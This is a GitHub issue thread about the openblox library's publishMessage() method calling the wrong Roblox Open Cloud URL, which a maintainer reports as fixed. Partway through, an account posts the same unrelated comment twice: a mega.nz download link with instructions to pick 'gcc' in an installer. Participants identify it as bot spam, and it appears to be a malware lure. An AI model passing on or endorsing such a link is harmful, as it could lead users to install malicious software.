### ISSUE TITLE
`MessagingApi.publishMessage()` uses the incorrect request URL.

### ISSUE THREAD

**Issue by LuckFire** [MightyPart/openblox#10]
When attempting to use [MessagingApi.publishMessage()](https://open.blox.wiki/cloud/messaging/publishMessage#example), the status that gets returned is 404.

When inspecting the URL that is requested, it does not seem correct according to [Roblox's OpenCloud API documentation](https://create.roblox.com/docs/reference/cloud/messaging-service/v1). Instead of requesting `https://apis.roblox.com/messaging-service/v1/universes/{universeId}/topics/{topic}`, the URL that is being requested is `https://apis.roblox.com/cloud/v2/universes/{universeId}/topics/{topic}`.

I am willing to make a PR that resolves this.

**Comment by cameronpcampbell** [comment]
This has now been fixed in `1.0.49` - thanks. 👍

**Comment by Zoraaa-z** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by Zoraaa-z** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by LuckFire** [comment]
@MightyPart Hey, you may want to block users like this completely from posting on the repo 😓

**Comment by cameronpcampbell** [comment]
not these bots again. Idk why they are targeting me.

**Comment by LuckFire** [comment]
> not these bots again. Idk why they are targeting me.

They may be targeting me, it appears that any issue that I make they start to send something?

**Comment by cameronpcampbell** [comment]
This is very perculiar 😅.
